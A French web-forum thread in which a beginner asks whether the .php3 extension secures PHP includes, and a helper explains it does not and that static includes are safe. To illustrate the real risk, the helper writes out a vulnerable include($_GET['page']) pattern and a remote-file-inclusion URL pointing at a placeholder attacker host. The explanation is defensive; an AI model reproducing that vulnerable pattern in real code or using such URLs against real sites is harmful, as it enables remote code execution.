Extension php3 securise include ?

Profil bloqué -  
 Profil bloqué -
Bonjour,

est que pour sécuriser les include je doit juste mettre comme extensiion php3 ?

merci d'avance
Configuration: Windows Vista
Firefox 3.0.1

7 réponses

  1. pyschopathe Messages postés 2053 Statut Membre 137
     
    Non, changer l'extension ne sécurisera pas les include ! Et pourquoi php3 ? Que cherchez-vous à faire ?
    -1
  2. Profil bloqué
     
    bah tout simplement

    pour securiser cette include :

    <?php
    include("news-accueil.php");
    ?>

    j'ai mis

    <?php
    if ($_GET['news-accueil.php'] == "news-accueil.php")
    {
    include("news-accueil.php");
    }
    ?>

    mais ça ne fonctionne pas !

    donc on ma conseiller dutiliser l'extension php3
    -1
  3. pyschopathe Messages postés 2053 Statut Membre 137
     
    Est-ce que news_accueil.php est le nom de la variable passée en paramètre dans l'URL ? L'extension php3 ne serrvira à rien, qui vous a conseillé ça ?
    -1
  4. Profil bloqué
     
    euh je ne comprend pas ce que vous voulais dire par passer en url je vous explique ma page :

    dans la page d'accueil j'ai :

    <?php
    include("haut-accueil.php");
    ?>

    mon texte

    <?php
    include("bas.php");
    ?>

    et dans haut-accueil j'ai :

    texte modifiable ...

    <?php
    include("news-accueil.php");
    ?>

    et voila ça constitue ma page d'accueil et j'aimerais que mes include sois sécuriser mais je ne comprend pas ce que vous voulez dire par "le nom de la variable passée en paramètre dans l'URL"

    Merci à vous de m'aider
    -1
  5. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  6. pyschopathe Messages postés 2053 Statut Membre 137
     
    La variable $_GET est utilisée pour récupérer les paramètres passés dans l'URL, via un formulaire par exemple, du genre :
    http://mon.site.fr/mapage.html?var1=val1&var2=val2
    

    où var1 et var2 sont les noms des variables et val1 et val2 les valeurs.
    Donc $_GET['var1'] = val1.

    Cependant vos include ne changeront pas dynamiquement (c'est-à-dire qu'à chaque fois que la page sera affichée, les mêmes include auront été effectués). Il n'y a donc pas besoin de sécuriser ça, le seul moyen de pirater serait de hacker le serveur et dans ce cas, même la sécurisation if / include ne servirait à rien !

    Le danger viendrait d'un site où on passe la page à inclure par l'URL :
    http://mon.site.fr/mapage.html?page=news.php
    

    puis
    include( $_GET['page'] );
    

    car l'adresse pourrait être modifiée en :
    http://mon.site.fr/mapage.html?page=http://hacker.com/mapage.php
    

    ce qui serait une énorme faille en matière de sécurité !

    En gros, pas de soucis à vous faire tant que vous utilisez les include comme vous le faites.

    Dites-moi si j'ai été assez clair.
    -1
  7. Profil bloqué
     
    Ok merci beaucoup de votre aide !!

    ceci est parfaitement claire !!

    donc pour l'instant je n'ai pas de soucis a me faire quand a la sécurité de mon site via les includes ?

    Merci de l'info !!!
    -1
    1. pyschopathe Messages postés 2053 Statut Membre 137
       
      Non, pour cette utilisation pas de danger, content d'avoir pu aider !

      Mettez le sujet en résolu svp ;p
      -1